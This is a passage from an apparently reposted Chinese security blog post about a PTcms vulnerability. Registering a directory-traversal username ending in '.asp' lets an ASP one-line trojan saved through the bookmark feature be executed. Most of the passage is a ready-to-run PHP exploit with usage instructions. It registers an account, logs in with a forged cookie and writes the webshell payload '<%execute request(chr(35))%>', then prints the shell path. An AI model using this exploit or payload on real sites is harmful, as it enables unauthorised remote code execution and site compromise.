于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

 

https://www.webshell.cc/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

<?php
//error_reporting(0);
print_r('
+---------------------------------------------------------------------------+
PTcms Code written Exploit
by:cfking@90sec.org
welcome to [url]www.90sec.org[/url]
+---------------------------------------------------------------------------+
'
);

if($argv[1]==null){
print_r('
Usage: php '.$argv[0].' url
Example:
php '.$argv[0].' [url]www.site.com[/url]
');
;exit;
}
$url=$argv[1];
$user=substr(md5(time()),0,10).".asp";
$settime=date("Y-m-d",time());
$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=%CF%C2%D2%BB%B2%BD");
if($to!==null){
postzend($url,"comeurl=http%3A%2F%2Fwww.cscity.net%2Fuser%2Findex.php&username=$to&password=hacker&cookietime=31536000&dosubmit=%CC%E1+%BD%BB",'login','/user/logchk.php');
$cookie="logtime=$settime; logip=110.110.110.110; pt_userlv=%B7%B2%C8%CB; pt_userpmnum=0; pt_username=$to";
postzend($url,'1=%3C%25execute+request%28chr%2835%29%29%25%3E&dochange=%D0%DE+%B8%C4','exploit','/user/mark.php',$cookie);
}
function postzend($url,$content,$type='reg',$path='/user/reg.php?step=3',$cookie='ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON'){
global $user;
$host=$url;
$port="80";
$data = "POST $path HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$data .= "Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Referer: http://$host/user/reg.php?step=2\r\n";
$data .= "Cookie: $cookie\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[-] No response from $host \n";
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp .=fgets($ock, 1024);
}
if($type=='reg'){
$tag="注册成功";$msg="Reg Successful\n[-] shellpath [-] \nhttp://$host/data/user/$user/mark.ptv";
}
if($type=='login'){$tag="登录成功";$msg="Login Successful";}
preg_match("/<p>(.*?)<br\/>/", $exp, $arr);
$result=explode(",",$arr[1]);
if($result[0]=="$tag"){
echo "[*] $msg \n";
return $user;
}else{
preg_match("/<p>(.*?)<br\/>/", $exp, $arrs);
if(is_array($arrs)){
echo "[*] Exploit Successful\n";
echo "[*] The pass # \n";
}else{
echo "[-] Exploit Failed\n";
}
return false;
exit;
}

}
?>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3108.html